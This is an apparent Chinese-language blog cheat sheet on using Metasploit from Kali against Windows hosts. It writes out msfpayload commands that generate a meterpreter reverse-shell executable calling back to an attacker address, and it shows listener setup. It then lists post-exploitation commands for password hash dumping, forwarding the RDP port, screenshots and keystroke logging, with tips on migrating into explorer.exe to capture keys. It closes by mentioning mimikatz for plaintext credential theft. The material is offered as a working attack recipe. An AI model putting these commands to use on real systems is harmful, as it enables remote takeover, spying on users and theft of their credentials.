標籤:des style blog http color io os ar 使用
產生監聽用的shell.exe:reverse_tcp(反向串連)
path : payload/windows/meterpreter/reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe
reverse_http/https(反向串連)
path:payload/windows/meterpreter/reverse_http/https
msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe
通過http/https的方式反向串連,在網速慢的情況下不穩定,在某部落格上看到https如果反彈沒有收到資料,可以將監聽連接埠換成443試試。
bind_tcp(正向串連)
path : payload/windows/meterpreter/bind_tcp
正向串連shell,因為在內網跨網段時無法串連到attack的機器,所以在內網中經常會使用,不需要設定LHOST。
利用shell.exe監聽:
msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.1.2msf exploit(handler) > set LPORT 8080msf exploit(handler) > exploit -jmsf exploit(handler) >sessions
基本命令:
常用命令:
background:將當前會話放置後台load/use:載入模組Interact:切換進一個通道migrate:遷移進程run:執行一個已有的模組,這裡要說的是輸入run後按兩下tab,會列出所有的已有的指令碼,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。Resource:執行一個已有的rc指令碼。
寫入檔案夾:
meterpreter > pwdmeterpreter > cd C:\meterpreter > pwdmeterpreter > mkdir Hacked by AutoRootmeterpreter > ls
寫入內容:
edit + 檔案,調用vi編輯。
網路相關:
網路命令則有列出ip資訊(ipconfig),展示修改路由表(route),還有連接埠轉寄(portfwd)
meterpreter > portfwdmeterpreter > portfwd add -l 1314 -p 3389 -r 192.168.1.2
在建立規則之後就可以串連本地1314連接埠,這樣遠端3389連接埠就轉寄出來了
鍵盤監聽:
meterpreter > screenshotmeterpreter > keyscan_startmeterpreter > keyscan_dump
注意一下windows會話視窗的概念,windows案頭劃分為不同的會話(session),以便於與windows互動。會話0代表控制台,1,2 代表遠端桌面。所以要截獲鍵盤輸入必須在0中進行。可 以使用getdesktop查看或者截張圖試試。否則使用setdesktop切換。
如果不行就切換到explorer.exe進程中,這樣也可以監聽到遠端桌面連線進來之後的鍵盤輸入資料。
mimikatz:
抓取明文
kali產生shell監聽目標主機